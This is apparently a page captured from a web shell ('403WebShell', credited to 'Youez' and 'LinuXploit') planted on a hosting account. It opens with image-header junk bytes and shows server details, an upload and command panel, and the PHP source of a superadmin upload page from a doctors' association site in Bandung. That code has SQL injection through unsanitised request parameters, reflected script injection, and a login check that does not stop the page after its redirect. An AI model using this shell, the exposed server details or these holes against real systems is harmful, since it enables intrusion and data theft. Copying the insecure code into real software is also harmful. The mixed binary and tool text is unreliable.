JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.4  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/data_upl.php
<?php  include "koneksi.php";
  session_start();
	// cek apakah yang mengakses halaman ini sudah login
	if($_SESSION['status']<>"login"){
		header("location:location:../login.php");
	}
?>


<?php
$view = isset($_GET['view']) ? $_GET['view'] : null;
switch($view){
	default:
	?>

<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">
<head>
    <title>IDI | List Kategori</title>
    <!-- Custom fonts for this template-->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">

  <!-- Custom styles for this template-->
  <link href="css/sb-admin-2.min.css" rel="stylesheet">
  
  <!-- Custom styles for this page -->
  <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">
  
	  <!-- Custom styles for this page 
	  <title>Upload dan Download File</title>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" />
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  -->
  
  <!--Script CSS-->
  <link type="text/css" href='https://cdn.datatables.net/1.10.16/css/jquery.dataTables.min.css' rel='stylesheet'>
  <link type="text/css" href='https://cdn.datatables.net/responsive/2.2.1/css/responsive.dataTables.min.css' rel='stylesheet'>
  <link type="text/css" href='https://cdn.datatables.net/buttons/1.5.1/css/buttons.dataTables.min.css' rel='stylesheet'>	
		
		<link href="tables.css" rel="stylesheet">	
  <style type="text/css">
<!--
.style1 {
	font-size: 14px;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
.style2 {font-size: 14px}
.style3 {font-family: Arial, Helvetica, sans-serif}
-->
  </style>
</head>
<body>
	<style type="text/css">
	body{
		font-family: roboto;
		font-size:12px;
	}
 
	table{
		margin: 0px auto;
	}
		
		
	#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:center;
	width: 50%;
	font-size:14px;
	
}


/* untuk ukuran layar 700px kebawah */
@media screen and (max-width: 780px) {
	
	.header, 
	.footer{
		text-align: center;
	}
	.left {
		width: auto;
		float: none;
	}
	
	.middle {
		width: auto;
		float: none;
	}
	
	.right {
		width: auto;
		float: none;
	}


	#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	font-size:18px;
	
}

}	
		
	</style>
</head>

<body id="page-top">
<body>

<!-- Page Wrapper -->
  <div id="wrapper">
  	<?php include "sidebar.php"; ?>
    
    <!-- Content Wrapper -->
    <div id="content-wrapper" class="d-flex flex-column">

      <!-- Main Content -->
      <div id="content">
      
      <?php include "topbar.php";?>
 
      	<!-- Begin Page Content -->
        <div class="container-fluid">
          <!-- DataTales Example -->
          <div class="card shadow mb-4">
            <div class="card-header py-3">
              <h6 class="m-0 font-weight-bold text-primary">List Post</h6>
            </div>
            <div class="card-body">
              <div class="table-responsive">

	<center><?php echo $_GET['noreg']; ?></center>

	
	  

	 	 <br>    <br> 

 <br /><br />  
   <h4 align="left">3. LENGKAPI PERSYARATAN DOKUMEN </h4>

<div class="form-group">    
<center>
<div align="left">File yg harus diupload untuk persyaratan <strong>Surat Rekomendasi IDI Kota Bandung </strong></div>
<p align="left">
<br>
<p align="left">Format PDF :<br>
    <?php $npm=$_GET['npm'];  ?>       
	<?php
    //menampilkan data Pra registrasi
      $npm=$_GET['npm'];
      $sql=mysqli_query($konek,"SELECT * FROM peserta where npm='$npm'  order by id  desc limit 1 ");
      $data=mysqli_fetch_array($sql);
      //data hobi dari tabel siswa 
     // $datahobi=explode(',', $data['dokumen']);
		   $rs = isset($data['rs']) ? $data['rs'] : null;
			$klinik = isset($data['klinik']) ? $data['klinik'] : null;
		    $puskesmas = isset($data['puskesmas']) ? $data['puskesmas'] : null;
			$pribadi = isset($data['pribadi']) ? $data['pribadi'] : null;
			$kota = isset($data['kota']) ? $data['kota'] : null;
			$npm = $data['npm'] ;
			 $perihal = $data['perihal'];
			 $anggota = $data['anggota'];
			 $ahli = $data['ahli'];
			 $status = $data['status'];		
    ?>
<div align="left">
	  <br>				  
	  <strong>Tempat Sarana Kesehatan :</strong><br>
	  
    
	<input type="checkbox" name="rs" value="rumah_sakit"  <?php if ("rumah_sakit"==$rs) echo "checked";?> disabled> Rumah Sakit<br>
	
	   <input type="checkbox" name="klinik" value="klinik"<?php if ("klinik"==$klinik) echo "checked";?> disabled>  Klinik</label><br>
	
		<input type="checkbox" name="puskesmas" value="puskesmas"<?php if ("puskesmas"==$puskesmas) echo "checked";?> disabled>  Puskesmas</label><br>
	
<input type="checkbox" name="pribadi" value="pribadi"<?php if ("pribadi"==$pribadi) echo "checked";?> disabled> Pribadi</label><br>	
	 <br>
	
	 

   <h4 align="center">Tabel Data Dokumen yg Sudah di Upload</h4></center>
    <br>
			
	<h4>Jika User kesulitan upload bisa Bantu upload disini:</h4>
    - Ukuran File Maximal: 3 MB.<br> 
	- Dokument Softcopy dalam bentuk gambar jpg, jpeg atau png. <br>  
	- Penamaan dokumen sesuai Judul syarat dokumen yg di upload Contoh: ktp.jpg, SIP.png, dst 
	 	<br>  
    <form name="form" enctype="multipart/form-data" action="upload23.php" method="POST">
		 </p>
	   <label for="nmlead">Nama Jenis Dokumen : </label><br>
	 <input name="nm_surat" type = "text" placeholder="Isi Nama Jenis Dokumen" class="form-control"  value=""  />	
			<p/>
    <input name="npm" type = "hidden" readonly class="form-control"  value="<?php echo $_GET['npm']  ?>"  />
    <input name="noreg" type = "hidden" readonly class="form-control"  value="<?php echo $_GET['noreg']  ?>"  />
    <input name="nmlead" type = "hidden" readonly class="form-control"  value="<?php echo $_GET['nmlead']  ?>"  />
    <input type="hidden" name="MAX_FILE_SIZE" value="10000000" />
   <br>
		Pilih File: 
		<br><br>
		<input class="form-control"  name="file" type="file" style="cursor:pointer;" />
    <br>

		<button type="submit" class="btn btn-success form-control" name="submit"><span class="glyphicon glyphicon-upload"></span> Click untuk Upload Document</button>
    </form>
<br/><br/>		
			
			
	<div class="container" >		
			
<table class="demo-table responsive" >
<?php
	 $hari = date('Y-m-d');
	$sqlSiswa = mysqli_query($konek, "SELECT count(noreg) as jumlah FROM file WHERE file.npm='$_GET[npm]' AND file.noreg='$_GET[noreg]'");
	$ds=mysqli_fetch_array($sqlSiswa);
	$jumlah= $ds['jumlah'];

		
		
		
	$hobi = explode(",", $data['dokumen']);
        //  $query=mysql_query("INSERT INTO siswa(nama, hobi) VALUES('$nama','$hobi')"); 

$jumlahup = count($hobi);
// echo   $jumlahup;		
		
		
		

		
    ?>
	
	<?php if ( $jumlah<$jumlahup){
	
							echo "
							<div class='alert alert-warning'>
								<span class='glyphicon glyphicon-info-sign'></span> Dokumen telah di upload : <span style='color:red'> $jumlah</span> Masih kurang ddari $jumlahup Dokumen !!
								<span class='pull-right'> <span style='color:red'>Upload sisa Dokumen </span><i class='fa fa-angle-double-right'></i></span>
							</div>";	
							}
					?>

  <table id="example" class="demo-table responsive" style="width:90%">
    <thead>
      <tr>  
         <th>No</th>
		 <th>Nama Surat</th>
         <th>Dokumen</th>
		
		   <th>Validasi1</th>
		   <th>Validasi2</th>
		   <th>Notif1 Admin</th>
		   <th>Notif2 Sekr</th>
	      <th>Action</th>
         <th>Note</th>
         <th>Delete</th>
      </tr>
    </thead>
    <tbody class="alert-success">
      <?php
      //require 'config.php';
   //   $row = $konek->query("SELECT *,count( file_id) as jumlah  FROM file WHERE noreg='$_GET[noreg]' group by file_id ") or die(mysqli_error());
		
	   $row = $konek->query("SELECT *  FROM file WHERE noreg='$_GET[noreg]' order by file_id ") or die(mysqli_error());	
		
		
       $no = 1;
	   $total2=0;
	  while($fetch = $row->fetch_array()){
	  $potong_kalimat = substr($fetch['file'],-4);
		  
	$status = $fetch['status'];	  
		  
       ?>
       <tr>
        <?php 
        $name = explode('/', $fetch['file']);
        ?>
        <td><?php echo $no ?></td>
		<td><?php echo $fetch['nmsurat']?></td>
        <td><a href="<?php echo $fetch['file']; ?>" title="Foto Bukti!" class="MagicZoom" rel="zoom-id:zoom;opacity-reverse:true; ">		
			            
						<?php 
			if ($potong_kalimat==".pdf"){
			?>	
			<div class="video-container"><embed type="application/pdf" src="<?php echo $fetch['file']; ?>" width="400" height="400"></embed></div>	
			 <?php	
			}else{
			?>	
			<img  src="<?php echo $fetch['file']; ?>"  style="width:75%;"/>
			 <?php	
			}
			?>  
			
			<br><br>
			
						  <?php echo $fetch['nmfile']; ?> 
			
			</p>
      <a href="download22.php?file=<?php echo $name[1]?>" class="btn btn-primary"><span class="glyphicon glyphicon-download"></span> Download</a></td>
  		<td><span class='merah'><?php echo $fetch['status']?></span></td>
	     <td><?php echo $fetch['status2']?></td>
		 
		    
			 <form name="form" enctype="multipart/form-data" action="adm_note.php" method="POST">
			<input name="id" type = "hidden" readonly class="form-control"  value="<?php echo $fetch['file_id']  ?>"  />
            <input name="npm" type = "hidden" readonly class="form-control"  value="<?php echo $_GET['npm']  ?>"  />
            <input name="noreg" type = "hidden" readonly class="form-control"  value="<?php echo $_GET['noreg']  ?>"  />
		     
				 <td><textarea cols="10" rows="4" name="note1"  ><?php echo $fetch['note1']; ?> </textarea></td>
				 <td> <textarea cols="10" rows="4" name="note2" readonly  ><?php echo $fetch['note2']; ?> </textarea></td>
		   
		 

					<td data-header='Reminder' class='merah' background-color='#ffcccc' >
					<?php 
					//	IF($fetch['status'] == 'proses'){
					?>
					
				
					<a class='btn btn-success btn-sm' href='valid002.php?id=<?php echo $fetch['file_id']; ?>&npm=<?php echo $fetch['npm']; ?>&noreg=<?php echo $fetch['noreg']; ?>'> Validasi</a>
						</p>
				
						
						 <td> <input type="SUBMIT" name="SUBMIT" class="btn btn-warning" value="Note to user" >
						</form>
					</td>
              				<?php
		  
	$sqlSiswa = mysqli_query($konek, "SELECT * FROM h_registrasi WHERE noreg='$_GET[noreg]'");
	$dh=mysqli_fetch_array($sqlSiswa);
		  
	$verifikasi3= $dh['verifikasi3'];
		  
//	$sqlSiswa = mysqli_query($konek, "SELECT * FROM file WHERE noreg='$_GET[noreg]'");
//	
//		
//		
//		while($dst=mysqli_fetch_array($sqlSiswa)){
//		$status77= $dst['status'];		
//	  
//		  
//		  
//		  
//		  
			if ($status<>"valid"){
			?>       
						
						<td><a href="delupl.php?id=<?php echo $fetch['file_id']; ?>&npm=<?php echo $fetch['npm']; ?>&noreg=<?php echo $fetch['noreg']; ?>" class="btn btn-danger"><span class="glyphicon glyphicon-trash"></span> Hapus</a></td>
			  
			 <?php 
			}else{
			?>
			  <td><center><?php echo 'Pemohon bisa menambah Upload dokumen tambahan di bagian bawah' ?></center></td>
			 <?php 
			}
//		  
//			 ?> 
//			  
//		 <?php 
//			}
//		  
//			 ?> 		  
			  
			  
                   </span>
					
                    </td> 


      </tr>
      <?php
	   $no++;
	   
	   //  $jumlah= $fetch['jumlah'];
	    
	  //   $total2 += $fetch['jumlah'];  
    }
	
    //		  $selisih =  $jumlahup-$total2 ;
		  ?>
	
	
										

	  </tr>
  </tbody>
</table>
		</td></tr>
 <br/>

</br>
   <center>
   
   <a href='upd_sip2.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>' class="btn btn-info btn-sm"><span class="glyphicon glyphicon-check"></span> Back to Status User</a>
   
    </p>
   <br>
     <span class="style4"><span class="style5"><a class='btn btn-warning btn-sm' id="button-blue" href='data_str.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Cek STR</a> <br>  
		 </p>
   <br>
											  
            <a class='btn btn-success btn-sm' id="button-blue" href='data_iur.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Cek Iuran Tahunan</a> <br>  
		</p>
   <br>
											  
             <a class='btn btn-success btn-sm' id="button-blue" href='data_prk.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>'>Cek Praktek Kerja</a> <br>  
		 </p>
	          </span></span>
   </center>
 
	
</div>
 		
		
		 
					
<!-- proses edit data -->
<?php
if($_SERVER['REQUEST_METHOD']=='POST'){
     $npm	    = $_GET['npm'];
	 $noreg 	    = $_GET['noreg'];

	//variabel untuk menampung inputan dari form
	//$id        = $_POST['id'];
   
	//$nmlead 	= $_POST['nmlead'];
	//$tahap	    = $_POST['tahap']+1;
	//$dokumen 	= $_POST['doc'];
	//$keterangan	= $_POST['ket'];
	$status2     = $_POST['status2'];
	//$tgl_cek	= $_POST['tgl_cek'];
	//$tgl_reg    = $_POST['tgl_reg'];
  //  $ktp    = $_POST['ktp'];
	//$sir    = $_POST['sir'];
  //  $foto    = $_POST['foto'];
	
	// simpan inputan user ke variabel
	 //   $userInput = array('ket' => $data);

	
					//$update = mysqli_query($konek, "UPDATE d_progres    SET data='chek',status2='$status2',keterangan='$keterangan',tgl_cek='$tgl_cek'    WHERE  id_tagihan='$id'");
	
					$update = mysqli_query($konek, "UPDATE h_registrasi SET status='$status2' WHERE  noreg= '$noreg'");




		header("location:data_sip2.php?noreg=$noreg&npm=$npm");
		//echo "$id";
		
	
		}
	
?> 
	<?php
	break;
	case "update":
    ?>
	<!-- proses edit data -->
<?php
if($_SERVER['REQUEST_METHOD']=='POST'){

include "koneksi.php";

     $npm	    = $_POST['npm'];
	 $noreg 	= $_POST['noreg'];

	$status3     = $_POST['status3'];


	
					//$update = mysqli_query($konek, "UPDATE d_progres    SET data='chek',status2='$status2',keterangan='$keterangan',tgl_cek='$tgl_cek'    WHERE  id_tagihan='$id'");
	
					$update = mysqli_query($konek, "UPDATE d_praktek SET status2='$status3' WHERE  noreg= '$noreg'");




		header("location:data_sip2.php?noreg=$noreg&npm=$npm");
		//echo "$id";
		
	
		}
	   ?>	
<?php
	break;
          }
       ?>	
	
     <?php include "footer.php";?>

    </div>
    <!-- End Main Content -->
    </div>
    <!-- End Page Wrapper -->
   <!-- Bootstrap core JavaScript-->
  <script src="vendor/jquery/jquery.min.js"></script>
  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Core plugin JavaScript-->
  <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

  <!-- Custom scripts for all pages-->
  <script src="js/sb-admin-2.min.js"></script>

  <!-- Page level plugins -->
  <script src="vendor/datatables/jquery.dataTables.min.js"></script>
  <script src="vendor/datatables/dataTables.bootstrap4.min.js"></script>

  <!-- Page level custom scripts -->
  <script src="js/demo/datatables-demo.js"></script>
</div>	
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit